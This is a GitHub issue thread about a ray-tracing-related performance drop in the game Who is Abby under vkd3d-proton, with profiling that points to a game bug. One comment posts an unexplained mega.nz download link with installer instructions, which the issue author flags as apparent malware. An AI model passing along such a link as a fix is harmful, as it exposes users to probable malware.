### ISSUE TITLE
Who is Abby (2614800): abysmal performance in "Facing Reality" level

### ISSUE THREAD

**Issue by adolfintel** [HansKristian-Work/vkd3d-proton#2085]
As the title says, I'm testing Who is Abby, an UE5.2 indie game that just came out.

It becomes completely unplayable once you get to the Facing Reality level, about 4 hours into the game (use [this savegame](https://github.com/user-attachments/files/16740111/WalkingSim.zip), it goes in %localappdata%).

The problem seems to be somehow related to ray tracing as **using nodxr solves the issue**. The game has a ray tracing option, turning it on makes this level run "better" (10-25 FPS), turning it *off* actually makes it run worse (5-10 FPS avg)!. In both cases, there's a 100% GPU load constantly and even with the lowest settings and resolution the game is unplayable.

I'm not sure if this is a game bug or a vkd3d bug, I don't see anyone complaining in the steam discussions and some people have already finished the game, so I suspect the latter.

### Software information
* Who is Abby (appid 2614800), version 1.0
* Arch Linux, Kernel 6.10

### System information
- GPU: AMD Radeon 6900XT
- Driver: Mesa 24.3, current master
- Wine version: Proton experimental
- VKD3D-Proton version:  Current master

### Log files
Nothing interesting in the logs.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by adolfintel** [comment]
I think the user above is trying to distribute malware @HansKristian-Work

**Comment by runar-work** [comment]
Whatever it's doing, it's not disabling ray tracing altogether. I got some RGP captures on Deck without RT enabled, and while starting a new game is fine (as there is no actual RT going on), in the Facing Reality level it's sinking a lot of time into a single RT stage when it obviously shouldn't be.

I also checked Windows perf while on RTX 3070 and got similar results there as on Linux, i.e. noticeably lower perf when RT is disabled in the settings compared to when it's enabled. Looks like a game bug that isn't unique to vkd3d-proton.
